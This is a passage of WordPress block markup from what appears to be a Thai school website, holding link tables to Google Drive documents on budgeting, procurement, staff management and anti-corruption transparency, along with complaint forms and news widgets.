200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong><br>   <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงบประมาณ</a><br>      <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br>       <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br>       - คู่มือฝ่ายบริหารงานทั่วไป</td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 